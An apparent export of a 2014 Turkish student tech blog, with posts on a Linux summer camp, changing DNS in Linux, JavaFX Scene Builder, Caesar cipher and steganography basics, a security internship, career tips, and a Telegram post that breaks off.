<p>[caption id=”attachment_225” align=”alignnone” width=”976”]<a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/IMG-20140818-WA0002.jpg"><img class="size-large wp-image-225" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/IMG-20140818-WA0002-1024x576.jpg" alt="Gölcükte SDÜ lüler Selfiesi :)" width="976" height="549" /></a> Gölcükte SDÜ lüler Selfiesi :)[/caption]</p>
<p>[caption id=”attachment_226” align=”alignnone” width=”976”]<a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/IMG-20140818-WA0008.jpg"><img class="size-large wp-image-226" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/IMG-20140818-WA0008-1024x576.jpg" alt="Linux Yaz Kampı Gölcük Gezisi" width="976" height="549" /></a> Linux Yaz Kampı Gölcük Gezisi[/caption]</p>
<p>Linux Yaz Kampının son günü açılışta olduğu gibi güzel bir tören ile katılımcı belgeleri verildi :)</p>
<p>[caption id=”attachment_228” align=”alignnone” width=”976”]<a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/A.jpg"><img class="size-large wp-image-228" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/A-1024x576.jpg" alt="Linux Yaz Kampı Sistem ve Ağ Yönetimi C Sınıfı" width="976" height="549" /></a> Linux Yaz Kampı Sistem ve Ağ Yönetimi C Sınıfı[/caption]</p>
<p>[caption id=”attachment_229” align=”alignnone” width=”976”]<a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/B.jpg"><img class="size-large wp-image-229" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/B-1024x576.jpg" alt="Katılım Belgem :)" width="976" height="549" /></a> Katılım Belgemi Alırken :)[/caption]</p>
<p> </p>
<p>[caption id=”attachment_230” align=”alignnone” width=”976”]<a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/E.jpg"><img class="size-large wp-image-230" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/E-1024x768.jpg" alt="Diğerlerine o da katıldı :)" width="976" height="732" /></a> Diğerlerine o da katıldı :)[/caption]</p>
<p> </p>
<p>Son olarak tatillerinde,işlerinden bize vakit ayırarak gönüllü olarak bu eğitimleri veren tüm eğitmenlerimize teşekkür ediyorum :)</p>
<p>[caption id=”attachment_231” align=”alignnone” width=”976”]<a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/F.jpg"><img class="size-large wp-image-231" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/F-1024x576.jpg" alt="Linux Yaz Kampı Eğitmenleri " width="976" height="549" /></a> Linux Yaz Kampı Eğitmenleri[/caption]</p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Linux DNS Değiştirme2014-10-06T16:14:00+00:00ahmetgurel.github.io/dns/linux/linux%20dns/linux%20dns%20degistirme/2014/10/06/linux-dns-de%c4%9fi%c5%9ftirme<p>DNS(Domain Name System) nedir?</p>
<p>Türkçe olarak Alan Adı Sistemi olan DNS girdiğimiz sitelerin IP adresini tutan bir adres defteri gibidir.Girdiğimiz bir domain tıkladığımızda kullandığımız DNS bizi yönlendirdiği için bazen ulaşamama durumları oluyor farklı nedenlerden o IP yı engellıyorlar ve bu site yasaklanmıştır diyor bizde bunun için farklı DNS ler kullanarak erişimimize devam ediyoruz :)</p>
<p>Türkiyede yasaklanan sitelerden zamanında youtube,twitter gibi sitelerde girdiği için herkes DNS değiştirmeyi ve yardımcı proğramlar,browserler kullanmayı öğrendi sanırım yasakların tek iyi sonucu :)</p>
<p>Fakat Linux biraz daha az kullanıldığı için her yerde windows için anlatılıyor.Durum böyle olunca bende Linux a yeni başlamış arkadaşların işine yarayabilir diye Linuxta DNS Değiştireceğim :)</p>
<p>Linuxta DNS adresleri /etc dizinin altınta resolv.conf dosyasında tutuluyor. (.conf configuration dan geliyor ayar,yapılandırma dosyası demektır.)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/11.png"><img class="alignnone size-full wp-image-200" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/11.png" alt="1" width="561" height="124" /></a></p>
<p>sudo ile root yetkisi alarak resolv.conf ayar dosyasını vim editörü ile açtık.(vim editörü yüklü değil ise “sudo apt-get install vim” komutu ile yükleyebilir yada nano ve vi editörlerinden birini kullanabilirsiniz.)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/2.png"><img class="alignnone size-full wp-image-201" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/2.png" alt="2" width="550" height="362" /></a></p>
<p>Default olarak gelen DNS imiz 127.0.1.1 adresini görüyoruz biz bunu Google’ın DNS i olan 8.8.8.8 /8.8.4.4 ile değiştireceğiz.Bunun için “i” tuşuna basarak editörümüzü INSERT hale getireceğiz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/31.png"><img class="alignnone size-full wp-image-202" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/31.png" alt="3" width="563" height="361" /></a></p>
<p>DNS imizi böyle girdikten sonra “ESC” tuşuna basarak “:wq” yazarak vim editörüne kaydet ve çık komutunu vermiş olduk.Fakat bu yaptığımız işlem bilgisayar yeniden başlattığımızda silinip eski halini alacak.Bunun için bizde</p>
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee; font-size: 12px; border: 1px dashed #999999; line-height: 14px; padding: 5px; overflow: auto; width: 50%;"><code>chattr +i /etc/resolv.conf
</code></pre>
<p>komutunu vererek işlemimizi kalıca hale getireceğiz.Chattr +i dosyamızı kilitlemeye yarayan komuttur.Ileri okuma için lütfen <a href="http://belgeler.gen.tr/man/man1/man1-chattr.html">tıklayınız.</a></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/Screenshot-from-2014-10-06-154253.png"><img class="alignnone size-full wp-image-203" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/Screenshot-from-2014-10-06-154253.png" alt="Screenshot from 2014-10-06 15:42:53" width="373" height="78" /></a></p>
<p>Yazım burada sona eriyor başka bir yazıda görüşmek üzere :)</p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
JavaFX & JavaFX Scene Builder2014-10-04T01:50:00+00:00ahmetgurel.github.io/g%C3%B6rsel%20programlama/gui/java/java%20g%C3%B6rsel%20programlama/java%20gui/javafx/programlama%20dilleri/2014/10/04/javafx-scene-builder<p>JavaFX ilk olarak 2007 yılında JavaOne konferansında duyuruldu. Swing in yerine yeni bir teknoloji olarak gelmiş swing in eksik yönleri güçlendirilmiştir..JavaFX,görsel olarak daha esnek ve gaha güçlü.3D, Canvas, Audio, Video, Web Service’leri cagirabilme CSS ile şekillendirebilme özellikleriyle Javanın ileride masaüstü ve web servislerinde yerini alacağa benziyor.Ileri okuma için <a title="tıklayınız" href="http://docs.oracle.com/javafx/2/overview/jfxpub-overview.htm" target="_blank">tıklayınız.</a>Bu yazımda JavaFX ile görsel programlama yaparken işinizi kolaylaştıracak JavaFX Scene Builder ı anlatacağım.Başlamadan önce Netbeans ve JavaFX Scene Builder kurulumu yapmanız gerekmektedir.</p>
<p>JDK 8 ve NetBeans 8.0.1 <a href="http://www.oracle.com/technetwork/java/javase/downloads/jdk-netbeans-jsp-142931.html" target="_blank">Indirmek için tıklayınız.</a></p>
<p>JavaFX Scene Builder 2.0 <a href="http://www.oracle.com/technetwork/java/javase/downloads/sb2download-2177776.html" target="_blank">Indirmek için tıklayınız.</a></p>
<p>Ilk olarak JavaFX Scene Builder ı açarak sürükle bırak ile istediğimiz arayüzü oluşturacağız.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/1.png"><img class="alignnone wp-image-184 size-large" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/1-1024x575.png" alt="javafx scene builder" width="976" height="548" /></a></p>
<p>Oluşturduktan sonra dosyamızı .FXML uzantısı ile kaydediyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/3.png"><img class="alignnone size-large wp-image-186" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/3-1024x575.png" alt="javafx scene builder" width="976" height="548" /></a></p>
<p>Burdaki işimiz bitti şimdi NetBeans a geçip bu görsel arayüzü kodumuza eklememiz lazım.NetBeans açılırken masaüstünü kaydettiğimiz javafx.FXML dosyamızı göreceğiz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/4.png"><img class="alignnone size-large wp-image-187" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/4-1024x575.png" alt="javafx" width="976" height="548" /></a></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/5.png"><img class="alignnone size-large wp-image-188" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/5-1024x575.png" alt="javafx" width="976" height="548" /></a></p>
<p> </p>
<p>NetBeans açıldığında new project dıyerek JavaFX ordanda görseldeki gibi JavaFX FXML Application açacağız.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/6.png"><img class="alignnone size-large wp-image-189" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/6-1024x575.png" alt="javafx" width="976" height="548" /></a></p>
<p> </p>
<p>Default ayarlar bu şekilde hiç bir değişiklik yapmadan finish diyoruz ve devam ediyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/7.png"><img class="alignnone size-large wp-image-190" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/7-1024x575.png" alt="javafx" width="976" height="548" /></a></p>
<p> </p>
<p>Projemiz bu şekilde önümüze gelecektir.Ana dosyamızın yanında FXMLDocument.fxml dosyasını görüyoruz.Bu dosyaya JavaFX Scene Builder ile oluşturup kaydettiğimiz arayüz dosyasının içindeki kodları yapıştıracağız.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/8.png"><img class="alignnone size-large wp-image-191" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/8-1024x575.png" alt="javafx" width="976" height="548" /></a><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/9.png"><img class="alignnone size-large wp-image-192" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/9-1024x575.png" alt="javafx" width="976" height="548" /></a></p>
<p>Projemize kodu yapıştırdıktan sonra çalıştırmamız yeterli oluşturduğumuz arayüz NetBeans ortamında çalışacaktır.Surekli kopyala yapıştır yapmak istemiyorsanız Scene Builder i IDE niz ile birleştirebilirsiniz fxml dosyanıza tıkladığınız Scene Builder açılır ve oradan tasarımı yapıp save dedıkten sonra kodlarınız otomatik olarak yüklenir.IDE nize Scene Builder eklemek için Tools seçeneğinden Options a tıklayarak Java yı seçip daha sonrada JavaFX e tıklayarak Scene Builder ın yolunu vermeniz gerekmektedir.Aşağıdaki resimde gösterildiği gibi yapabilirsiniz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/Screenshot-from-2014-10-30-141655.png"><img class="alignnone size-large wp-image-250" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/Screenshot-from-2014-10-30-141655-1024x718.png" alt="javafx-scnebuilder" width="976" height="684" /></a></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/10/10.png"><img class="alignnone size-large wp-image-193" src="http://www.gurelahmet.com/wp-content/uploads/2014/10/10-1024x575.png" alt="javafx" width="976" height="548" /></a></p>
<p>Yazımın sonuna gelmiş bulunmaktayım.Saat her zaman ki gibi 12 yi geçmiş ve bu sabah Kurban Bayramı :) Şimdiden Herkese iyi Bayramlar.Herhangi bir sorunda yorum kısmından veya sol tarafta ki sosyal ağlar kısmından ulaşabilirsiniz.</p>
<p> </p>
<p> </p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Kriptografi,Sezar Şifresi ve Steganografi2014-09-09T15:56:00+00:00ahmetgurel.github.io/genel%20g%C3%BCvenlik/imagehide/kripto/kriptografi/kriptoloji/sezar%20%C5%9Fifrelemesi/siber%20g%C3%BCvenlik/stenografi/veri%20gizleme/2014/09/09/kriptografisezar-%c5%9fifresi-ve-stenografi<p><strong>Kriptografi</strong> bilgi güvenliği kavramlarını sağlamak için çalışan matematiksel yöntemler bütünüdür.Yani gönderdiğiniz bir bilginin istemediğiniz kişilerce okunmaması için kullanılan tekniklerin(şifreleme) tümüdür.</p>
<p><strong>Bilgi güvenliği kavramları:</strong></p>
<ul>
<li>Gizlilik (<i>privacy/confidentiality</i>)</li>
<li>Kimlik Denetimi (<i>authentication/identification)</i></li>
<li>Bütünlük (<i>integrity</i>)</li>
<li>Reddedilmezlik (<i>non-repudation</i>)</li>
<li>Erişim Kontrolü (<i>access control</i>)</li>
</ul>
<p>Temel olarak kriptografi bunlar üzerine kuruludur ve şifreleme kısmını halleder.</p>
<p><strong>Kriptoanaliz</strong> kriptografi ile şifrelenmiş dosyaların şifre analiz ederek şifreyi çözmeye dayanır.</p>
<p><strong>Kriptoloji </strong>ise şifre bilimidir.Şifrelenmiş dosyaların güvenli olarak alıcıya ulaşması ve şifrenin analiz edilip doğru kişi tarafından okunmasını sağlamaktır.</p>
<p><strong>Bazı şifreleme teknikleri:</strong></p>
<ul>
<li>Sezar Şifrelemesi</li>
<li>Steganografi(Veri Gizleme)</li>
<li>Açık anahtarlı şifreleme</li>
<li>Rotor makinası</li>
<li>Çırpı fonksiyonları</li>
</ul>
<p>Ben bu yazımda Sezar şifrelemesi ve Stenografi ye değineceğim.</p>
<p><strong>1-Sezar Şifrelemesi</strong></p>
<p>Sezar şifrelemesinde her harf harf atlatılarak yazılır. “ahmet” kelimesi üçlü sezar şifrelemesine göre “djphy” dir.(Latin alfabesi kullanılmıştır.Ö bu yüzden yok Türk alfabesi olarak düşünmeyiniz.)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/09/Sezar_sifresi.gif"><img class="size-medium wp-image-165 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2014/09/Sezar_sifresi-300x157.gif" alt="Sezar_sifresi" width="300" height="157" /></a></p>
<p> </p>
<p style="text-align: center;">Üçlü Sezar Şifrelemesi</p>
<p style="text-align: left;">Sezar şifresi günümüzde pek kullanılmaz.Kriptolojinin atalarındandır.Kolaylıkla kırılabilmektedir.Kaç harf atladığını görerek çözülebileceği gibi Brute Force(Kaba Kuvvet) saldırısıyla Latin alfabesinin(25) elemanlarının hepsi denenerek bulunabilir.</p>
<p style="text-align: left;"><strong>2-Steganografi (Veri Gizleme)</strong></p>
<p>Stenografi, stenografi alfabesi ile yazılan herhangi bir şeyi yine steno bilen kişiler okuyup anlayabiliyor.Mahkemelerde ve meclis oturumlarında konuşmaların hızlı yazıya dökülmesi için kullanılmıştır.Tarihçesi böyledir.Steganografi ve stenografi karışabilmektedir.</p>
<p>Steganografi ise veri gizleme demektir..Bir resmin içine yazı saklama, aynı zamanda müzik,video yada başka uzantılı dosyalara veri saklamak ve okumak için kullanılmaktadır.İnternette bununla ilgili bir çok program bulunmaktadır.Dosyaların içine veri yazıp ve şifrelemek için bunlardan bazıları:</p>
<p><strong>1-ImageHide:</strong> Resim dosyalarının içine veri gizlemeyi ve şifrelemeye yarayan araçtır.</p>
<p><strong>2-Mp3Stego:</strong>Bu araçta ses dosyalarının içine veri saklamaya yarar.</p>
<p><strong>3-StegoVideo:</strong>Bu aracında adından anlaşılacağı üzere video üzerine veri saklayabilirsiniz.</p>
<p>İnternette bunlar gibi bir çok program bulunmaktadır.Bunlar sadece bir kaçı.</p>
<p><strong>Basit Bir Örnek:</strong></p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/09/meteor-imagehide.png"><img class="size-medium wp-image-166 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2014/09/meteor-imagehide-225x300.png" alt="meteor-imagehide" width="225" height="300" /></a></p>
<p> </p>
<p>Bu resme ImageHide programı ile veri gizlenmiştir.Programı indirip resmi açtığınızda Read Data ya tıkladığınızda veriyi göreceksiniz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/09/meteor.jpg"><img class="size-medium wp-image-167 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2014/09/meteor-300x240.jpg" alt="meteor" width="300" height="240" /></a></p>
<p> </p>
<p>Programı kullandığınızda resimde ki metni görmeniz gerekiyor.Bu arada köpeğim meteor lada tanışmış oldunuz :)</p>
<p>Yazım burada bitiriyorum başka bir yazıda görüşmek üzere hatalarım varsa affola yorum,öneri ve sorularınız için yorum kısmını yada sol taraftaki sosyal ağlardan bana ulaşabilirsiniz.</p>
<p><strong>Faydalandığım Kaynaklar:</strong></p>
<p>1-http://tr.wikipedia.org/wiki/Kriptografi</p>
<p>2-http://tr.wikipedia.org/wiki/Kriptoloji</p>
<p>3-http://tr.wikipedia.org/wiki/Sezar_%C5%9Fifrelemesi</p>
<p>4-http://tr.wikipedia.org/wiki/Stenografi</p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Linux a Giriş ve VirtualBox ile Ubuntu Kurulumu2014-08-30T17:32:00+00:00ahmetgurel.github.io/linux/linux%20kurulumu/ubuntu/ubuntu%20kurulumu/virtualbox/virtualbox'a%20ubuntu%20kurulumu/2014/08/30/linux-a-giri%c5%9f-ve-virtualbox-ile-ubuntu-kurulumu<p>Linux a giriş yapmak isteyenler için Linux nedir,nerelerde kullanılır nasıl kurulur ve kullanılır gibi soruların cevaplarını bulunduran başlangıç dökümanıdır.Türkiyede Özgür yazılım farkındalığını artırmak için hazırlanmıştır.Her türlü soru,görüşlerinizi yorum ve iletişim kısımlarından iletebilirsiniz.İyi çalışmalar.</p>
<iframe src="//www.slideshare.net/slideshow/embed_code/38515443" width="476" height="400" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Yaz Stajı ve INVICTUS2014-08-29T20:09:00+00:00ahmetgurel.github.io/bilgisayar%20m%C3%BChendisli%C4%9Fi/e%C4%9Fitim/hayattan%20gelenler/%C4%B1ntelrad/linux%20yaz%20kampi/siber%20g%C3%BCvenlik/staj/teknoloji/yaz%20staj%C4%B1/2014/08/29/yaz-staj%c4%b1-ve-intelrad<p> </p>
<p>Zorunlu stajlarım 2 ve 3.sınıfın yazlarında olmasına rağmen 1.sınıfın yazında staj yapmak istiyordum.Yazılım Kulübü ile yıl içinde gittiğimiz etkinliklerden birinde Mehmet İNCE nin sunumuna denk geldim.Sunum sonunda Mehmet İNCE ve çalıştıkları şirketin CEO su Can Yıldızlı ile de tanışma fırsatı buldum.Şirketin staj başvuraları açıldığında bende başvuru yaptım <a href="https://www.invictuseurope.com/">INVICTUS</a> şirketi üç aşamalı bir sınav sistemi ile stajyer almakta ve son aşama şirketin hazırladığı yazılı sınav ve mülakat ile son bulmakta.Staja kabul edilip başladığımdan beklediğimden çok daha iyi bir ortam ve eğitim fırsatı buldum.Şirketin çalışma saatleri sabah 9.30 ile aksam 7.30 İstanbul trafiğinde gereksiz zaman kaybına şirket kesin çözüm bulmuş :) Şirket aynı zamanda iki dönem olarak stajyer almakta.Her stajyer seçilen konular üzerinde sunum hazırlayarak diğer stajyerlere anlatıyor, stajyerler aynı zamanda projeler verilerek sorumluluk alabiliyor.Bunların yanında Can abinin akşamları verdiği bazen sabahlara kadar süren eğitimleri paha biçilemezdi.
<a href="http://www.gurelahmet.com/wp-content/uploads/2014/08/1404977996813.jpg">
</a>Şirket siber güvenlik üzerine olduğu için genellikle bu konularda araştırma ve eğitimler veriliyor.Bunun yanında kendi yazılımlarınıda geliştirdikleri için yazılım konusunda da eksik kalmıyorsunuz :) Bu yılın başında güvenliğe merak sarmıştım ve stajın sonunda iyi ki burada staj yapmışım dedim.Stajyerlerle şirket çalışanlarıyla eğlenceli mükemmel bir yaz geçirdim.Bilmediğim bir çok şeyi duydum,öğrendim,araştırma fırsatı buldum.Her alanda uzmanlar bulunduğu için sorduğum her soruya anında cevap alabildim ve hiç bir ego olmadan arkadaş ortamında çalışıyor kadar rahat çalıştım.Stajımın bitiş tarihinde Linux Yaz Kampına geçecektim ve şirket Linux Yaz Kampına giden stajyerlerin ulaşım,yemek,konaklama masraflarını karşıladı.Tabi stajın başında olduğu gibi staj sonunda da sınav olduk ve sınavı geçemeyenlerin stajının yanacağı ve benım gibi seneyede orada staj yapmayı düşünen arkadaşların şırket ile bağlantısının kesileceği söylendi.Yani bu kadar eğitimin,sunumun,projelerin ve verdikleri desteğin karşılığını INVICTUS <a href="https://www.intelrad.com/"> </a>şirketide haklı olarak sınavlar ile görmek istiyor :) Daha yolun başında olduğumdan yazın öğrendiklerim konularda çalışmalar yaparak kendimi geliştirmeye devam edicem.INVICTUS <span style="color: #222222;"> şirketi iş hayatı konusunda hangi alanlarda çalışıp neler yapmam gerektiği konusunda çok yardımcı oldu.</span></p>
<p>Diğer arkadaşlarımın staj yerlerini ve nasıl staj yaptıklarını gördüğümde duyduğumda ne kadar kaliteli bir staj yaptığımın farkına vardım.Siz siz olun staj yerinizi iyi seçin stajyerlere önem veren eğitim veren bir yer olsun.Naylon staj yapmayın vaktinizi boşa geçirmeyin.</p>
<p>Buradan tüm yaz boyunca bana verdikleri destek ve eğitimler için:</p>
<p><span style="color: #222222;">CEO muz Can Yıldızlıya</span></p>
<p>Pentest Lead imiz Mehmet İNCE ye</p>
<p>Şirketimizin neşesi Koryak Uzan a</p>
<p>Her sorunumuzla ilgilenen Can Şimşek e</p>
<p>Ve tüm INVICTUS <span style="color: #222222;">Çalışanları ve stajyerlerine böyle güzel ve eğitici bir yaz için çok teşekkür ederim :)</span></p>
<p> </p>
<p> </p>
<script>// <![CDATA[
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-65335586-1', 'auto'); ga('send', 'pageview');
// ]]></script>
Bilgisayar Mühendisliği Öğrencisi Olmak...2014-08-14T16:17:00+00:00ahmetgurel.github.io/bilgisayar%20m%C3%BChendisli%C4%9Fi/computer/hayattan%20gelenler/teknoloji/2014/08/14/bilgisayar-m%c3%bchendisli%c4%9fi-%c3%b6%c4%9frencisi-olmak<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/08/computer.jpg"><img class="size-medium wp-image-112 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2014/08/computer-300x246.jpg" alt="computer" width="300" height="246" /></a></p>
<p>Mühendislik okumak tabi ki zordur.Okumanın yanında sürekli sektöre yönelik şeyler öğrenip kendimizi iş hayatınada hazırlamalıyız.Hele ki benim gibi Bilgisayar Mühendisliği okuyorsanız.Sürekli gelişen teknolojiler,internet,programlama,güvenlik,veritabanı,sistem ağ yönetimi,işletim sistemleri hepsinin birçok alanı ve bölümü var.Bunların hepsine nasıl öğreneceğim hepsini nasıl öğrenirim?</p>
<p>Hepsini öğrenemezsiniz ben de siz de hatta hiç kimse..</p>
<p>Bunun için alan seçilmeli o alana yönelinmelidir ve o alanda uzmanlaşmak gerekir.Ama bunun yanında teknolojiler birbirinden ayrılamaz bu yüzden yeni çıkan teknolojılerı takip edip ne olduğunu bilmeli, diğer teknolojilerin de temel düzeyde bilinmesi gerekir.</p>
<p>Şimdi benim gibi Bilgisayar Mühendisliği öğrencisi olup yolun başında olan arkadaşlar neler yapabilir?</p>
<p>1-Her programlama dilini öğreneceğim diye uğraşmayın sağlam bir algoritma alt yapısıyla bir dile iyi bir şekilde hakim olun(Daha sonra arkası gelecektir.)</p>
<p>2-Birçok teknolojiyi ve alanların ne iş yaptığını okuyarak araştırarak alanınızı seçiniz bir iki yıl sonra pişman olursanız zamanınızı boşa harcamış olmayın.(Hiç bir bilgi zaman kaybı değildir elbet, bir gün işinize yarar)</p>
<p>3-Uzmanlaşmak istediğiniz alan ile ilgili forumları,blogları,sektördeki uzman kişileri takip edin sürekli okuyun (Twitter,Facebook,Linkedin)</p>
<p>4-Mutlaka Linkedin hesabı açın ilgilendiğiniz alan ya da ilgileneceğiniz alanı profilinize yazarak sektördeki çoğu kişiyi ekleyin burası profesyonel bir ağ çekinmeyin(Buradan staj,iş ve eğitim fırsatları bulabilirsiniz)</p>
<p>5-Mutlaka bilişimle ilgili kulüpleri,dernekleri,eğitim kuruluşlarını takip edin etkinliklerini kaçırmayın etkinlikteki konuşmacılarla tanışın soru sorun çekinmeyin.</p>
<p>6-Blog açın öğrendiklerinizi yeni teknolojileri hatta günlük gibi saçmalayın ama yazın orası sizin kendi not defteriniz.(Ücretsiz olanlarıyla başlanabilir wordpress.com, blogspot.com)</p>
<p>7-Github hesabı açın, Github kod paylaşım yeridir.Kod paylaşamayacak düzeyde olsanız bile hesapları takip edin bol bol kod projelerı okuyun.</p>
<p>8-Araştırmalarınızı şimdiden ingilizce yapın projeler buyudukçe zaten türkçe kaynaklar yeterli olmayacak mecburen ingilizce kullanacağız.</p>
<p>9-Linux işletim sistemini kurun görün nerelerde nasıl ne işe yaradığına bakın korkmayın hep kullanmak zorunda değilsiniz ama bilin.</p>
<p>10-Alan derslerinizi sadece ders ve not olarak görmeyin ileride yapacağınız iş olarak görün en sevdiğiniz alan derslerine göre bölüm seçip uzmanlaşabilirsiniz unutmayın.</p>
<p>11-Yazları mutlaka gönüllü,zorunlu,ücretli,ücretsiz demeden staj yapın staj yerleriniz ilgilendiğiniz teknolojilerle ilgili olsun ve mutlaka bişeyler öğrenin sorun projelere dahil olabileceğiniz yerler olsun. Staj yerlerinizi yaza bırakmadan dönem başından ayarlayın.(Sonra fotokopi çekmeyin)</p>
<p>12-Blog açsam ne yazacam bir şey bilmiyorum demeyin, deneyin yazın ne öğrenirseniz yazın, sosyal yazın basit diye düşünmeyin hatta bu yazı gibi şeyleri siz de yazın :)</p>
<p>Benden bu kadar şuan ben de alanımı seçip uzmanlaşmak için çalışmalara başlayacağım sizin de tavsiyeleriniz olursa yorum kısmından yazabilirsiniz :)</p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Telegram(Akıllı Telefonlarda Güvenli Mesajlaşma)2014-08-14T11:18:00+00:00ahmetgurel.github.io/android/g%C3%BCvenli%20mesajlasma/ios/siber%20g%C3%BCvenlik/teknoloji/telegram/whatsapp/2014/08/14/telegramak%c4%b1ll%c4%b1-telefonlarda-g%c3%bcvenli-mesajla%c5%9fma<p>Günümüzde akıllı telefonlarda mesajlaşmak için çoğumuz Whatsapp i kullanıyoruz dosya resim müzik her türlü medyayı paylaşmamızı sağlıyor fakat ne kadar güvenli? Konuştuğumuz mesajlar hem kendı telefonlarımızda kaydedilip hemde whatsapp sunucularında iz bırakmakta eğer bir uygulama veya kişi telefonunuza erişim hakkı aldığında telefonumuzda kayıtlı olan bu mesaj dosyalarına ulaşıp bunlara erişmesi olası riskler arasında.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/08/Screenshot_2014-08-14-10-45-41.png"><img class="alignnone size-medium wp-image-103" src="http://www.gurelahmet.com/wp-content/uploads/2014/08/Screenshot_2014-08-14-10-45-41-168x300.png" alt="Screenshot_2014-08-14-10-45-41" width="168" height="300" /></a></p>
<p> </p>
<p>Üstte ki ekran görüntüsü telegramın normal mesajlaşma görüntüsü.</p>
<p> </p>
<p> </p>
<p> </p>
